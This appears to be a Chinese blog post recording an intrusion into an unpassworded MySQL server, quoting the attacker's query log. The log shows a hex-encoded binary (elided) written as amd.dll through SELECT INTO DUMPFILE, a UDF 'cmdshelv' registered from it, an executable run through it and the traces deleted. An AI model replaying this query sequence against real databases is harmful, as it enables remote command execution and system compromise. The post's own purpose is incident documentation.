mysql设置问题导致的攻击记录
主要是当时安装mysql的时候没有设置root密码,实际上已经设置了root用户只能localhost登录,但是不知道这个入侵者是如何远程root登录的~~~
入侵者的ip:220.189.225.30 是个美国的ip
分析:
先创建一个临时表, create table if not exists tempMix4(data LONGBLOB);
然后插入一堆代码,估计是文件的16进制编码,
110624 12:50:28 49679 Query set @a = concat(”,0x4D5A90000300000004000000FFFF0000B80000000000000040…此处省去很多很多…0000000000000000000000)
110624 12:50:38 49679 Query INSERT INTO tempMix4 VALUES (@a)
然后执行了以下的语句,从而在windows下会在
49679 Query select data from tempMix into DUMPFILE ‘C:\\WINDOWS\\amd.dll’
49679 Query select data from tempMix into DUMPFILE ‘C:\\WINT\\amd.dll’
49679 Query select data from tempMix into DUMPFILE ‘C:\\WINDOWS\\SYSTEM32\\amd.dll’
49679 Query select data from tempMix into DUMPFILE ‘C:\\WINT\\amd.dll’
49679 Query select data from tempMix into DUMPFILE ‘..\\lib\\plugin\\amd.dll’
49679 Query select data from tempMix into DUMPFILE ‘C:\\amd.dll’
49679 Query select data from tempMix into DUMPFILE ‘..\\bin\\amd.dll’
这些文件夹生成了一个amd.dll文件,
然后执行以下操作:估计是执行这些文件,文件具体干嘛的不知道~~
110624 12:50:44 49679 Query create function cmdshelv returns string soname ‘amd.dll’
49679 Query create function cmdshelv returns string soname ‘amd.dll’
49679 Query create function cmdshelv returns string soname ‘C:\\WINDOWS\\system32\\amd.dll’
110624 12:50:45 49679 Query create function cmdshelv returns string soname ‘C:\\WINNT\\amd.dll’
49679 Query create function cmdshelv returns string soname ‘C:\\WINDOWS\\SYSTEM32\\amd.dll’
49679 Query create function cmdshelv returns string soname ‘C:\\WINNT\\amd.dll’
49679 Query create function cmdshelv returns string soname ‘amd.dll’
110624 12:50:46 49679 Query select cmdshelv(‘c:\\33061.exe’)
49679 Query select cmdshelv(‘c:\\33061.exe’)
110624 12:50:47 49679 Query select cmdshelv(‘cmd.exe cmd/c del c:\33061.exe’)
110624 12:50:48 49679 Query select cmdshelv(‘cmd.exe cmd/c del c:\33061.exe’)
110624 12:50:49 49679 Query select cmdshelv(‘cmd.exe cmd/c del c:\33061.exe’)
49679 Query select cmdshelv(‘cmd.exe cmd/c del c:\amd.dll’)
&nb
